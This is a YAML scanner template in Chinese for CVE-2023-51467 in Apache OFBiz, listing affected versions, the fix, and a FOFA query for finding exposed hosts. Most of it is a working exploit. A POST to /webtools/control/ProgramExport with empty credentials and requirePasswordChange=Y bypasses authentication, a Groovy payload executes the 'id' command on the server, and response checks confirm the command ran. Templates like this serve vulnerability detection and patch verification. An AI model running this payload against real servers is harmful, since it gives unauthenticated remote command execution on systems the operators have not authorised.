product: Apache-OFBiz
vName: Apache-OFBiz 鉴权绕过导致命令执行
type: 代码执行
vID:
  - CVE-2023-51467
level: 3
vDesc: Apache OFBiz 存在鉴权绕过漏洞，攻击者通过特定构造的请求可绕过权限验证，并最终导致命令执行。
version: All versions <= 18.12.06
note: 漏洞利用需要启用特定组件并对外暴露。
search:
  FOFA: app="Apache_OFBiz"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/开发框架漏洞/Apache OfBiz 鉴权绕过导致命令执行 CVE-2023-51467.md
fix:
  - 升级到 Apache OFBiz 18.12.07 或更高版本。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y
      header:
        Content-Type: application/x-www-form-urlencoded
      data: "groovyProgram=throw+new+Exception('id'.execute().text);"
    verify:
      path: ''
      logic: and
      check:
        - status: 200
        - body:
            value:
              - uid=
              - gid=
            logic: and
